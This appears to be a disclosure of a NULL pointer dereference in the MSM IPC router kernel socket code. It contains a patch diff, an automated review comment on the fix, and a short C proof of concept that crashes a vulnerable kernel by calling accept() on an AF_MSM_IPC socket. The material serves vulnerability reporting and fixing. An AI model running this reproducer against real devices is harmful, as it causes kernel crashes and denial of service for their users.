Description
NULL pointer dereference when a user process calls the accept() system call on an AF_MSM_IPC socket.
The patch is as follows:
diff --git a/net/ipc_router/ipc_router_socket.c b/net/ipc_router/ipc_router_socket.c
index 828797b..652531a 100644
--- a/net/ipc_router/ipc_router_socket.c
+++ b/net/ipc_router/ipc_router_socket.c
@@ -555,10 +555,18 @@ static unsigned int msm_ipc_router_poll(struct file *file,
static int msm_ipc_router_close(struct socket *sock)
{
struct sock *sk = sock->sk;
- struct msm_ipc_port *port_ptr = msm_ipc_sk_port(sk);
+ struct msm_ipc_port *port_ptr;
int ret;
+ if (!sk)
+ return -EINVAL;
+
lock_sock(sk);
+ port_ptr = msm_ipc_sk_port(sk);
+ if (!port_ptr) {
+ release_sock(sk);
+ return -EINVAL;
+ }
ret = msm_ipc_router_close_port(port_ptr);
msm_ipc_unload_default_node(msm_ipc_sk(sk)->default_node_vote_info);
release_sock(sk);
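Review bot: Both new early exits return -EINVAL from a release handler, but as far as I recall the socket core discards the value of ops->release, and the convention in other protocol release handlers is to treat a missing sk as already torn down and return 0, so `if (!sk) return 0;` would be the more conventional form. The `!port_ptr` branch additionally skips `msm_ipc_unload_default_node()`, so any vote recorded in `msm_ipc_sk(sk)->default_node_vote_info` would be dropped on that path; whether a vote can exist without a port is not visible here and should be confirmed. The `!sk` check deserves a comment explaining when it fires, e.g. `/* sk is NULL when release runs on a socket that never got a protocol sock, as in the accept() case described above */`. The body of msm_ipc_router_close continues past the last line of the hunk.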
PoC
#include <stddef.h>
#include <sys/socket.h>
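#define AF_MSM_IPC 27

/*
 * Minimal reproducer for the accept() NULL dereference described above:
 * open an AF_MSM_IPC datagram socket and call accept() on it.
 *
 * Returns 0 if both calls succeed, 1 if either fails (e.g. the address
 * family is not available), so a plain syscall error is not mistaken
 * for the kernel-side fault.  The original used the non-standard
 * `void main()` and passed an unchecked socket() result to accept().
 */
int main(void)
{
    int fd = socket(AF_MSM_IPC, SOCK_DGRAM, 0);

    if (fd < 0)
        return 1;

    /* The description above identifies this call as the one that
     * reaches the NULL dereference; NULL addr/len are valid for accept(). */
    if (accept(fd, NULL, NULL) < 0)
        return 1;

    return 0;
}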